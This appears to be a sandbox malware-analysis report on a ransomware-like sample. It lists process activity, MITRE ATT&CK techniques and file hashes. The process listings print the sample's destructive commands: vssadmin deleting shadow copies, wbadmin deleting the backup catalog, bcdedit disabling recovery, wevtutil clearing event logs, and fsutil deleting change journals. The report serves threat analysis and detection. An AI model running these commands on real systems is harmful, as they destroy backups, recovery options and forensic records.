- Suspicious use of AdjustPrivilegeToken
PID:8600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5148 -ip 51481⤵PID:6636
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f1⤵PID:2688
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f1⤵PID:7268
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 51⤵
- Runs ping.exe
PID:11132
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet1⤵
- Deletes backup catalog
PID:14280
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable1⤵PID:14260
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:1⤵
- Deletes NTFS Change Journal
PID:14056
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures1⤵
- Modifies boot configuration data using bcdedit
PID:14040
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:13764
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:13748
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:13604
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup1⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:9172
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\1⤵
- Enumerates connected drives
PID:5644
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\1⤵PID:8236
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\1⤵
- Enumerates connected drives
PID:12520
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
12KB
MD54e1a2798ddabb0d6c8b5aee3f314fe21
SHA129f543939c16c1f0adaa2f633d05bb2eadf66fb3
SHA2562f9d6d3828423386053d0a2ce48b2c5af46af7b2943c57022f1eff07675728a4
SHA512b4433978575c2d35ae01adca272de977dee0e1ee8e44023efcdd9ed3a1875b29e6c6510fd07416ed9b7353d429eb060e733b4200ece1176b6dd0c1d1e8ad5148
-
Filesize
684B
MD526fb1882392cabf5227dbf2d8f1fa529
SHA17b593c8e32b71d5eb026e7c953ad98362004e120
SHA2563b9e70336e5b5305d753b4bad9abcf4cc4a57c44dc99a909d94769d21e403c6f
SHA51234afa00189d78e57077c343daae4fc491ada6ff6077f9fe0e7590ea79edde1a8b77b0d2e2e1f4369bb12bd77677b6749bd962948b23cc26ff42114e6093c61f5
-
Filesize
1KB
MD501c8fb3cc9feb243b2b3b176aad36cd0
SHA1e02bb19f99813bd275858b280afac383aa92f7fb
SHA256e0f2c9930ccf81bc3f18aa505fbdd4c9314bf836a7cce384efda8b70cae715f4
SHA5127078a8ad6919432444b205456db2f4c2223768cad051c5636ee91f6a407471cd934bab615f369b1ac315ce1e365a4c7548c261586a0100327f96c507841b9995